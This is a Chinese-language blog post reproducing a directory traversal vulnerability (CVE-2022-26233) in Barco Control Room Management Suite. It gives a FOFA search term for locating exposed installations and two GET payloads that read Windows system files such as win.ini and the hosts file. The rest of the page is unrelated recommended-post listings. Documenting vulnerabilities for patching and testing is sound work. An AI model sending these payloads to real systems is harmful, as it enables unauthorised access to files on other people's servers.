Barco Control Room Management Suite - 目录遍历(CVE-2022-26233)

已于 2022-05-17 16:10:31 修改
阅读量307 收藏
点赞数 1
文章标签: 安全
于 2022-05-13 16:57:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124755600
版权

一、漏洞描述

通过 Suite 2.9 Build 0275 进行的巴可控制室管理被发现容易受到目录遍历的影响,从而允许攻击者访问敏感信息和组件。请求必须以“GET /..\..”字符串开头。

二、影响版本

Barco Control Room Management Suite <= 2.9 build 0275

三、漏洞环境

fofa:barco

四、漏洞复现

paylaod:

GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini

GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

五、更新建议

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:

巴可公司官方网站 视觉影像专家 - Barco

whatever`
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-26133漏洞复现
初岄的博客
06-10 1336
Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
wjlee-barco:我的GitHub个人资料的配置文件
04-12
最新作品2021-04-10 -生命的最新帖子参考
自学鸿蒙应用开发(32)- 为UI组件定义接口
面向对象思考
08-19 415
前一篇文章为自定义组件实现了描画功能,但是代码中的描画动作都是硬编码,无法由开发者控制。本文对之前的代码进行重构,以对外提供控制接口。 定义RoundProgressBar内部类 定义一个实现单个进度条功能的内部类,用于管理每个进度条的边缘颜色,内部颜色,最大值,最小值和当前值。 class RoundProgressBar{ MultiRoundProgressBar ownerBar; private Color edgeColor; private Color barCo
u-boot的Makefile文件详解
AndrewYZWang的博客
10-31 641
# # (C) Copyright 2000-2006 # Wolfgang Denk, DENX Software Engineering, [email protected]. # # See file CREDITS for list of people who contributed to this # project. # # This program is free software; you ca...
ABAP--Printing barcode labels in SAP R/3
ChampaignWolf的专栏
04-19 1251
随着.NET 2.0的发布,将会使得使用ASP.NET 2.0来构建的Web应用越来越容易。使用ASP.NET 2.0和SQL Server 2005,将会比ASP.NET 1.1更方便地构建多层体系架构的web应用。本文,将使用ASP.NET 2.0和SQL Server 2005 (.net使用Visual Studio 2005 beta 2,SQL Server 2005使用april c
Live.Barco Screen Sharing-crx插件
04-02
语言:English (United States) 该Chrome扩展程序主要针对https://live.barco.cloud/开发 此Chrome扩展程序主要针对https://live.barco.cloud/开发。此扩展程序使用本机chrome API返回屏幕ID,因此可以完成屏幕共享。
Live.Barco屏幕共享「Live.Barco Screen Sharing」-crx插件
03-08
此Chrome扩展程序主要针对https://live.barco.cloud/开发 此Chrome扩展程序主要针对https://live.barco.cloud/开发。此扩展程序使用本机chrome API返回屏幕ID,因此可以完成屏幕共享。 支持语言:English (United ...
Projector Toolset for G-series UserGuide
12-20
Projector Toolset for G-series UserGuide
Communicator-PC-Windows
11-13
Barco_ApplicationSoftware_R33002303_v04.08.15.00__Communicator-PC-Windows
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 654
作用就是定义属性之间的数学关系
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 432
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
红队攻防渗透技术实战流程:云安全之云服务安全:ECS和RDS
HACKONE的博客
05-18 22
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址:http://metadata.tencentyun.com/CF 云渗透框架项目:https://wiki.teamssix.com/CF/
Nginx - 安全基线配置与操作指南
小工匠
05-19 919
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 361
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
如何选择一款安全高效的数据自动同步工具?
最新发布
文件数据安全交换
05-21 178
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 408
Web应用防火墙的重要性
Microsoft Dataverse中的安全概念
全网:架构师研究会
05-15 824
Dataverse的一个关键特性是其丰富的安全模型,可以适应许多业务使用场景。只有当环境中存在Dataverse数据库时,此安全模型才会发挥作用。作为管理员,您可能不会自己构建整个安全模型,但通常会参与管理用户、确保他们拥有正确的配置以及解决与安全访问相关的问题的过程。提示视频符号查看以下视频:Microsoft Dataverse – Security Concepts Shown In Dem...
家用充电桩远程监控安全管理系统解决方案
蓝蜂物联网
05-15 280
本方案旨在通过先进的物联网技术、云计算、大数据分析以及人工智能等科技手段,构建一个集实时监测、异常预警、故障诊断、数据统计、远程控制于一体的智能化平台,确保充电桩的安全运行及用户充电过程的便捷性与安全性。综上所述,家用充电桩远程监控安全管理系统解决方案深度融合物联网、云计算、大数据分析和人工智能等前沿技术,实现了充电桩的精细化、智能化管理,不仅提升了用户充电体验,降低了运维成本,也为能源管理的智能化转型注入了强大动力,具有显著的社会效益和经济效益。家用充电桩远程监控安全管理系统解决方案。
文本文件(.csv文件可以作为文本文件处理)中保存了图书馆藏书信息,每条藏书记录占一行 数据字段说明: LIBRARY_ID:藏馆ID(可能有多个藏馆) REC_CTRL_I:录入编号 BOOK_BARCO:图书条码 DEPARTMENT:所属部门 BOOK_SEARC:索书号 TITLE:图书名称 ISN:ISBN出版号 AUTHORS:作者 PUBLISHER:出版社 PUBDATE_DA:出版时间 BOOK_ATTRI:图书属性 BOOK_STATU:图书状态 将数据写入result.txt中
06-09
好的,您可以使用以下Python代码读取CSV文件并将数据写入result.txt文件中: ```python import csv # 打开CSV文件 with open('library.csv', 'r', encoding='utf-8') as csvfile: # 读取CSV文件内容 reader = csv.reader(csvfile) # 打开result.txt文件 with open('result.txt', 'w', encoding='utf-8') as f: # 遍历CSV文件每一行数据 for row in reader: # 将每个字段用制表符分隔并写入result.txt文件 f.write('\t'.join(row) + '\n') ``` 其中,library.csv为你保存图书馆藏书信息的CSV文件名,result.txt为将要保存数据的文件名。运行以上代码后,你可以在当前目录下找到result.txt文件,并且每一行数据的字段都用制表符分隔。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值